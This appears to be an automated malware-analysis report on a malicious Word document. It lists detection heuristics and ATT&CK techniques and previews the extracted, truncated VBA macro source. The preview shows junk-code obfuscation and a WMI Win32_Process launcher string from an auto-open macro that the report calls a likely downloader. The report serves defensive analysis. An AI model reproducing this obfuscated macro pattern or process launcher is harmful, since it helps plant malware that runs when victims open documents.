MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1137.001 Office Application Startup: Office Application
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_WMI_PROCESS_CREATE' indicates the macro attempts to launch a process via WMI. The presence of an 'autoopen' macro, detected by 'OLE_LEGACY_WORDBASIC_AUTOEXEC' and 'OLE_VBA_AUTOOPEN', suggests the malicious code executes automatically upon opening the document. The script's complexity and obfuscation make it difficult to determine the exact payload, but the overall pattern points to a downloader.
Heuristics 8
-
ClamAV: Doc.Malware.Dpzn-6865610-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dpzn-6865610-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 57571 bytes |
SHA-256: 2adac7bf5211adaa8f02ce4a1df3651bbfd7b98c05a4e0b82734e74df6003c4e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "i4__069"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "S__5_9"
Function w681_65()
Select Case O1_088
Case 989112488
T5_1985 = Log(k133__2)
w47832 = CDate(412180375)
X0__466 = Fix(327689253 + 532122644 + s5__4_51 - Oct(116123150))
d551__ = Cos(838999496 - Sqr(211033595 - Atn(596790493)) - 656074700 + 691793211)
End Select
Select Case p_1_6__
Case 645094846
t381_7 = Log(T56401)
E5144_ = CDate(331569715)
R08992_ = Fix(48724903 + 844243764 + i226623 - Oct(582570588))
D104_99 = Cos(345851876 - Sqr(22855915 - Atn(954874129)) - 835924325 + 496444773)
End Select
Select Case o6744_1
Case 353388217
S70673 = Log(Q9__8_3)
Y4_59682 = CDate(481165943)
E10_0_ = Fix(970700126 + 899881013 + T9366_ - Oct(525264214))
d2__825_ = Cos(771181925 - Sqr(68816346 - Atn(104637905)) - 292588774 + 987998990)
End Select
Select Case j76_70
Case 913866681
k_9_06 = Log(f83_98_)
I44505 = CDate(879793349)
R29_5_6 = Fix(355564061 + 844613353 + s_88___2 - Oct(160110351))
i36802_1 = Cos(429552670 - Sqr(730916785 - Atn(565140922)) - 342905090 + 31145824)
End Select
Select Case U56___
Case 546386556
q97_11 = Log(F_48__66)
s537738 = CDate(572365110)
B66_70 = Fix(193541046 + 295663342 + f78__518 - Oct(559788259))
W4604_62 = Cos(302969357 - Sqr(283840797 - Atn(487181471)) - 852742645 + 349462739)
End Select
Select Case M_79__
Case 421611106
j29_2801 = Log(E1_04__9)
i_1___ = CDate(210261279)
U_607_6 = Fix(963439407 + 23482163 + S4_824 - Oct(505486632))
s_2222 = Cos(689128759 - Sqr(4520637 - Atn(730835165)) - 177270389 + 207950300)
End Select
Select Case T___9643
Case 251306671
r98_91 = Log(r__385)
C69113__ = CDate(357543196)
V_3_8_7 = Fix(807596840 + 984015382 + P_473_0 - Oct(763968225))
a73_901 = Cos(658251677 - Sqr(856887463 - Atn(723742852)) - 507398116 + 53238946)
End Select
Select Case L91361
Case 184153276
i691681 = Log(F0__88)
w73_173 = CDate(828120808)
V_9206 = Fix(42910562 + 931041674 + w5712_78 - Oct(314522656))
Z7_20_ = Cos(468064190 - Sqr(515105482 - Atn(916001680)) - 443595880 + 234455977)
End Select
Select Case U_4__3
Case 681922299
J0781_7 = Log(N1476_)
M3_9_27 = CDate(115889972)
V16207 = Fix(714280636 + 749440636 + k_3_6807 - Oct(839351765))
U95_8__ = Cos(305556619 - Sqr(534869588 - Atn(13668019)) - 453225823 + 816902808)
End Select
End Function
Function Q9__0891(d1__81_3, j_4528)
On Error Resume Next
Select Case i3_7459
Case 311734594
G7810_0_ = Log(c_779__9)
D84__762 = CDate(820156512)
a33___1_ = Fix(107947721 + 621240739 + b20_4_ - Oct(228459638))
f9994833 = Cos(534411737 - Sqr(613351241 - Atn(963603830)) - 586348357 + 37158108)
End Select
Select Case a5_80_0
Case 915257691
C66803 = Log(L25383_)
t6__0_86 = CDate(78644011)
Z42__407 = Fix(910110065 + 829736045 + M88635_8 - Oct(709054119))
n87768_2 = Cos(575299067 - Sqr(743103115 - Atn(876601799)) - 844109974 + 987458867)
End Select
Q26_9__ = j_4__9 + "winmgmts:Win32_ProcessStartup" + P__3_239
Select Case u____8_3
Case 156968570
j6__0401 = Log(z8_94_)
z4__74 = CDate(182477142)
T721_7_ = Fix(2479576 + 867003839 + j37800_ - Oct(492998035))
k94135 = Cos(298985 - Sqr(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.